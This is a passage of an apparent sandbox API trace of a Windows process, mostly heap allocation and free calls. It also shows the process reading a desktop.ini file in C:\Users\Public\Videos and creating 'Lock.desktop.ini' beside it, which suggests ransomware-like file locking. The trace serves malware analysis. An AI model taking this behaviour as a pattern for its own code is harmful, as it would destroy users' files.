dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabda0 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0224.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0224.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0224.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0224.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0224.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0224.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0224.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0224.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3854008 [0224.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0224.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0224.319] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0224.321] SetFilePointerEx (in: hFile=0x4e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0224.321] SetFilePointerEx (in: hFile=0x4e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0224.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0224.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0224.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0224.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0224.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0224.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.322] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos/" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0224.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0224.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0224.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0224.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0224.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0224.324] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/Lock.desktop.ini" (normalized: "c:\\users\\public\\videos\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0224.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0224.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0224.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0224.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0224.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0224.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0224.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0224.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0224.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0224.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0224.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0224.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e8020 [0224.333] SetFilePointerEx (in: hFile=0x4e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0224.333] ReadFile (in: hFile=0x4e0, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x17c, lpOverlapped=0x0) returned 1 [0224.335] ReadFile (in: hFile=0x4e0, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0224.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0224.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0048 [0224.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e8020 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e01d0 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.339] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0224.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0048 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0224.339] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.340] RtlAllocateHeap 